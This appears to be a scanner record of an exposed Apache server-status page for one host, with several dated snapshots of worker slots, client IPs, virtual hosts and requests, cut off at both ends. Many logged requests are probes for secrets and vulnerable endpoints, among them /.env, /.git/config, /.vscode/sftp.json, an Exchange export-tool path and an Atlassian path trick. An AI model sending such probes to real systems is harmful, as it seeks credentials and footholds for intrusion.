2.384046705870.00.01143.62 141.101.100.196h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-959208790/2/7666_ 1.474133122980.00.01207.03 172.70.226.133h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-959208790/5/8088_ 2.601035037850.00.00152.29 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-959208790/3/8115_ 2.104025718190.00.01180.67 172.68.230.138h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-959208790/6/8181_ 2.381032483150.00.04194.93 128.199.62.55http/1.1 3-959208790/7/7704_ 2.4906947657950.00.12214.10 192.53.126.23h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-959208790/6/7890_ 2.584038007310.00.02172.46 172.71.223.150h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-959210420/34/9774_ 3.130119659823590.00.54271.59 192.53.126.23http/1.1 4-959210420/36/9833W 3.480075504510.00.41336.24 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-959210420/42/9797_ 3.61431533319480.00.25219.43 192.53.126.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-959210420/39/9965_ 3.642039837170.00.32270.07 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-959210420/38/10227_ 3.53265759056510.00.37259.69 192.53.126.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-959210420/44/9665_ 3.62385660480020.00.20285.08 192.53.126.23http/1.1 4-959210420/42/10126_ 3.650042660690.00.36286.46 192.53.126.23http/1.17f7ffb32-1f6e-4
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc82f54fc2a
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 11-Dec-2023 20:15:49 CET Restart Time: Wednesday, 06-Dec-2023 07:41:32 CET Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 5 days 12 hours 34 minutes 16 seconds Server load: 0.07 0.12 0.09 Total accesses: 81067 - Total Traffic: 2.6 GB - Total Duration: 66707673 CPU Usage: u52.52 s41.99 cu546.04 cs464.86 - .232% CPU load .17 requests/sec - 5.7 kB/second - 33.4 kB/request - 822.871 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0294001no0yes010000 1293869no0yes010000 2293871no0yes010000 3293870no0yes19000 4293872no0yes010000 Sum500 149000 _______________________________________W__________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-292940010/201/1675_ 18.2213556436510.05.1845.69 162.158.78.97h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/282/1750_ 18.351018698990.03.7549.34 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-292940010/395/1879_ 18.2911323011923400.04.0156.71 172.71.146.125h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/366/1754_ 17.8211398302550.06.3841.63 162.158.22.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/325/1855_ 18.2166710198240.06.0543.83 181.43.97.92http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/266/1777_ 18.3053769240530.06.0883.38 165.22.108.223http/1.1 0-292940010/291/1798_ 18.35004913940.05.3671.12 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-292940010/205/1801_ 18.34616828660.03.3346.39 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-292940010/328/1796_ 18.20113010400710.03.4563.09 162.158.23.5h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/238/1734_ 18.304128509840.04.8374.30 165.22.108.223http/1.1 1-292938690/85/1265_ 10.2334513094770.01.6757.04 165.22.108.223http/1.1 1-292938690/100/1145_ 10.25922112910490.01.1643.85 172.71.150.110h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/147/1126_ 10.249210242963810.02.4550.98 172.70.57.165h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/89/1090_ 10.17256524195950.01.3046.90 172.70.175.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/64/1093_ 10.14919292641530.00.8333.71 172.71.151.83h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/130/1344_ 10.3120108537370.02.0455.03 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-292938690/94/1080_ 10.163172298200.02.2424.10 165.22.108.223http/1.1 1-292938690/78/1100_ 9.88923114590600.01.9830.09 162.158.186.210h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/71/1120_ 10.31212674300.02.0721.96 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-292938690/80/1092_ 10.2391122600700.01.8824.48 172.71.186.109h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/27/1328_ 7.82186606147750.01.1131.77 172.64.236.116h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/36/1309_ 8.2377319320599930.00.7023.76 172.70.185.162h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-292938710/25/1323_ 7.09186116422243300.01.7329.53 172.70.174.130h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/30/1289_ 8.237763437271600.012.1448.27 172.70.185.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/20/1339_ 6.9876803201870.00.5745.20 172.71.175.29h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-292938710/31/1245_ 6.98305838500.00.9141.67 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-292938710/32/1311_ 7.3919552097334310.01.8240.70 159.203.94.228http/1.1 2-292938710/31/1290_ 6.69195407071430.00.7971.49 159.203.94.228h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-292938710/32/1225_ 7.5076795713400860.01.5567.25 172.70.250.235h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/26/1195_ 6.481861020353310.00.7539.21 172.71.166.98h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/416/1476_ 18.2577011570640.010.6673.07 159.203.94.228http/1.1 3-292938700/374/1586_ 19.728237210822720.04.8752.19 172.71.131.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/370/1525_ 18.345010348120.03.8451.62 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-292938700/562/1740_ 19.11509556900.06.9633.46 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-292938700/378/1604_ 19.761015805230.04.7432.03 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-292938700/403/1539_ 18.757737119074770.05.6128.44 159.203.94.228http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/536/1793_ 19.054111240440.05.3854.17 165.22.108.223http/1.1 3-292938700/441/1566_ 19.6843809921240.06.4630.10 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-292938700/305/1383_ 19.656020086400.04.1841.71 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-292938700/484/1639W 18.64008881260.05.5734.52 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-292938720/127/2309_ 8.681783012749130.01.4466.50 172.64.236.110h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/51/2266_ 9.121788037099850.015.0997.25 172.68.27.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/48/2504_ 9.06195209997560.01.0057.27 159.203.94.228http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-292938720/58/2244_ 9.69108389660.01.5157.83 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-292938720/44/2444_ 8.19195250720038120.01.3399.19 172.70.254.129h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/40/2234_ 8.641783013176930.00.9054.91 141.101.100.152h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/42/2195_ 8.14195409301840.00.7078.72 159.203.94.228http/1.1 4-292938720/47/2256_ 8.231788
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc81215b9f4
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 16-Nov-2023 18:55:22 CET Restart Time: Saturday, 04-Nov-2023 04:38:38 CET Parent Server Config. Generation: 87 Parent Server MPM Generation: 86 Server uptime: 12 days 14 hours 16 minutes 43 seconds Server load: 0.00 0.02 0.01 Total accesses: 319130 - Total Traffic: 7.0 GB - Total Duration: 191636956 CPU Usage: u159.01 s134.7 cu1734.4 cs1283.19 - .304% CPU load .293 requests/sec - 6.8 kB/second - 23.0 kB/request - 600.498 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0580100no0yes010000 1579968no0yes010000 2579970no0yes010000 3579969no0yes19000 4579971no0yes010000 Sum500 149000 ___________________________________W______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-865801000/586/6346_ 49.470023811070.013.73152.74 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-865801000/565/5598_ 49.252025078280.011.41131.83 162.243.184.251http/1.1 0-865801000/524/6018_ 49.070031428480.019.97147.73 162.158.175.25h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-865801000/640/5875_ 49.322033836130.028.53159.22 162.243.184.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-865801000/508/6062_ 49.471024415960.014.15130.73 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-865801000/654/5817_ 49.3922336063970.016.48145.36 162.243.184.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-865801000/581/6034_ 49.460284588600.012.45130.01 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-865801000/538/5798_ 49.470025648590.014.83154.18 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-865801000/603/5737_ 49.393032235110.011.96139.61 162.243.184.251http/1.1 0-865801000/566/5347_ 49.31314424726980.07.79135.81 162.243.184.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-865799680/208/5926_ 33.92631014527180.03.82125.32 20.125.98.175http/1.1barrerasdecontencion.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-865799680/207/5849_ 33.99358018690610.04.56112.92 162.158.174.33h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-865799680/231/6319_ 33.98631029004260.03.05132.59 162.158.174.28h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-865799680/261/6161_ 33.99630049569470.05.30131.27 162.158.174.201h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-865799680/186/5841_ 33.95630014431460.03.78118.91 162.158.175.27h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-865799680/202/6117_ 33.99630058209220.05.73130.79 162.158.174.10h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-865799680/251/6208_ 33.77631023813830.03.88135.09 20.125.98.175http/1.1 1-865799680/194/6262_ 34.221019575550.03.70112.27 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-865799680/227/6117_ 33.99358020882290.04.54143.79 162.158.175.96h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-865799680/199/6014_ 34.08363019419460.02.55119.25 188.114.111.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-865799700/572/7728_ 50.22631163859130.010.69128.46 144.126.198.24http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-865799700/585/7514_ 50.89635037486910.010.75168.72 162.158.175.60h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-865799700/741/7320_ 50.89636038709970.023.24178.93 162.158.174.226h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-865799700/580/7450_ 50.86630176672580.010.35158.26 162.158.174.41h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-865799700/638/7235_ 51.1200157156290.015.77163.01 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-865799700/712/7438_ 50.62631071651370.022.10165.03 188.114.111.175h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-865799700/644/7198_ 50.85630031582850.011.23130.70 162.158.175.121h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-865799700/589/7235_ 50.85636044672910.012.70146.00 162.158.175.162h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-865799700/584/7767_ 50.860040727250.021.88170.23 162.158.175.148h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-865799700/707/6968_ 50.88630044153200.029.91175.57 162.158.175.78h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-865799690/592/6225_ 47.15363040283610.09.09140.63 188.114.111.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-865799690/518/6556_ 47.11447039486040.012.23139.39 188.114.111.166h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-865799690/440/6095_ 46.86358140337020.011.70147.03 144.126.202.105http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-865799690/415/6303_ 47.03453027159150.023.12137.51 172.64.238.34h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-865799690/554/6313_ 47.05442031229110.08.71128.20 162.158.174.8h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-865799690/571/6459W 47.000043098720.011.82161.80 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-865799690/436/6317_ 46.6544210941471540.010.76155.56 144.126.202.105http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-865799690/490/5970_ 47.01453239374390.09.84151.24 162.158.174.44h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-865799690/454/6071_ 47.11458043557380.030.93150.67 188.114.111.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-865799690/497/6746_ 47.03358024706060.050.74182.48 162.158.175.16h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-865799710/306/6221_ 38.9130928558019030.05.98179.46 162.158.174.138h2tandemsl.com:443done, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 4-865799710/263/6599_ 39.023025268520.08.59127.37 162.243.184.251http/1.1 4-865799710/257/6146_ 39.02229059948980.09.17133.35 162.243.184.251http/1.1 4-865799710/295/6160_ 39.0130882422281580.09.54120.96 188.114.111.176h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-865799710/290/6352_ 39.013020208760.08.99140.36 162.243.184.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-865799710/313/6135_ 39.053146036723900.021.11133.75 201.141.44.187h2barrerasdecontencion.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8b1240b7e
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 10-Nov-2023 07:38:56 CET Restart Time: Saturday, 04-Nov-2023 04:38:38 CET Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 6 days 3 hours 18 seconds Server load: 0.26 0.12 0.04 Total accesses: 133287 - Total Traffic: 2.8 GB - Total Duration: 78536872 CPU Usage: u13.71 s20.63 cu819.06 cs628.28 - .28% CPU load .252 requests/sec - 5.6 kB/second - 22.3 kB/request - 589.231 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0311826no0yes010000 1311957no0yes010000 2311828no0yes19000 3311825no0yes19000 4311827no0yes010000 Sum500 248000 ______________________W______________R____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-393118260/3/1946_ 0.04003773480.00.0249.36 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-393118260/0/1777_ 0.00013579010.00.0044.90 139.144.150.8http/1.1 0-393118260/1/2209_ 0.02013726000.00.0151.99 139.144.150.23http/1.1 0-393118260/1/1656_ 0.04003904280.00.0042.19 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-393118260/0/2004_ 0.00003851060.00.0050.65 139.144.150.23http/1.1 0-393118260/2/1894_ 0.03003763030.00.0053.33 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-393118260/2/2028_ 0.020365429780.00.0243.46 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-393118260/2/1807_ 0.03007344430.00.0239.28 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-393118260/2/1991_ 0.04004083140.00.0040.11 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 0-393118260/0/1674_ 0.00004259300.00.0059.83 139.144.150.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-393119570/3/2614_ 0.04006077830.00.0152.83 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-393119570/2/2817_ 0.04029205180.00.0355.52 139.144.150.8http/1.1 1-393119570/3/2992_ 0.040020284070.00.0169.40 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-393119570/3/2781_ 0.040028806360.00.0048.44 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 1-393119570/1/2890_ 0.04005925910.00.0054.61 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 1-393119570/1/2903_ 0.020318341760.00.0355.82 172.70.174.180h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-393119570/2/2850_ 0.040015125630.00.0065.16 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-393119570/3/3057_ 0.04008761070.00.0043.63 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-393119570/1/2762_ 0.040012968290.00.0056.23 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-393119570/2/2791_ 0.040110576740.00.0247.83 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-393118280/2/3125_ 0.04008303270.00.0153.75 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 2-393118280/1/3037_ 0.00008164150.00.0065.87 172.70.175.232h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-393118280/1/3135W 0.01007860950.00.0566.44 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-393118280/1/3185_ 0.010049836050.00.0268.16 139.144.150.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-393118280/2/3138_ 0.030050822120.00.0287.51 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-393118280/1/3278_ 0.04018213460.00.0066.10 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-393118280/2/3040_ 0.02008973200.00.0354.60 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-393118280/2/2842_ 0.03009945190.00.0662.58 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-393118280/1/3323_ 0.01008199080.00.0269.48 172.70.175.186h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-393118280/2/2888_ 0.03008262980.00.0384.86 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-393118250/1/2256_ 0.000014038470.00.0246.87 172.70.175.119h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-393118250/1/2575_ 0.00092818203140.00.0365.42 139.144.150.8http/1.1 3-393118250/2/2154_ 0.020011811180.00.0048.33 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-393118250/2/2274_ 0.03008671840.00.0056.73 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-393118250/2/2178_ 0.020017990430.00.0158.27 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-393118250/1/2322_ 0.020023604050.00.0064.18 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 3-393118250/0/2288_ 0.00092226404720.00.0078.45 172.70.92.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-393118250/1/2166R 0.021022840450.00.0050.31 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-393118250/1/2145_ 0.030016043770.00.0056.55 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-393118250/0/2223_ 0.000011159170.00.0042.08 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-393118270/1/3076_ 0.030013420880.00.0068.23 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-393118270/1/3328_ 0.030011579970.00.0167.65 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-393118270/0/3296_ 0.00017751278250.00.0066.44 172.70.38.39h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-393118270/1/3174_ 0.030014019980.00.0055.90 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-393118270/2/3211_ 0.020012112720.00.0079.07 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-393118270/2/3176_ 0.030029639550.00.0050.18 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-393118270/1/2902_ 0.030016911810.00.0053.57 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc83a487440
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 23-Sep-2023 03:13:16 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 15 days 15 hours 23 minutes 13 seconds Server load: 0.16 0.14 0.07 Total accesses: 881140 - Total Traffic: 20.6 GB - Total Duration: 267277337 CPU Usage: u228.4 s224.73 cu2617.4 cs2422.87 - .406% CPU load .652 requests/sec - 16.0 kB/second - 24.5 kB/request - 303.331 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0727175no0yes010000 1654142no0yes19000 2654143no0yes010000 3654141no0yes19000 4745202no0yes010000 Sum500 248000 _______________R___________________W______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-217271750/1214/12681_ 57.8205730258270.024.89268.43 95.163.104.122http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1286/12389_ 58.110034628330.018.27292.99 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-217271750/1579/13432_ 56.910637506560.021.50298.53 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-217271750/1581/12798_ 58.002678357858460.026.59318.04 203.162.123.52http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 0-217271750/1250/12012_ 57.910152383760.020.35297.60 54.36.148.53h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1586/11908_ 58.110249465620.022.22295.23 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-217271750/1298/12350_ 56.920081790750.035.13325.07 138.68.133.118http/1.1 0-217271750/1180/11858_ 57.55266056064170.021.16279.83 172.69.33.120h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1297/11944_ 56.90266054870060.027.60322.14 114.70.144.115http/1.1 0-217271750/1283/11924_ 56.63451162970840.019.71248.37 172.70.185.160h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/830/19384_ 95.32664144485860.013.52496.27 34.250.24.75http/1.1 1-216541420/1025/19681_ 95.281064872820.032.74455.24 66.249.66.128http/1.1barrerasdecontencion.com:443GET /robots.txt HTTP/1.1 1-216541420/1059/20066_ 95.4100134391540.013.54477.74 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-216541420/816/19635_ 95.1982639321060.020.78447.33 152.168.98.84h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216541420/750/19465_ 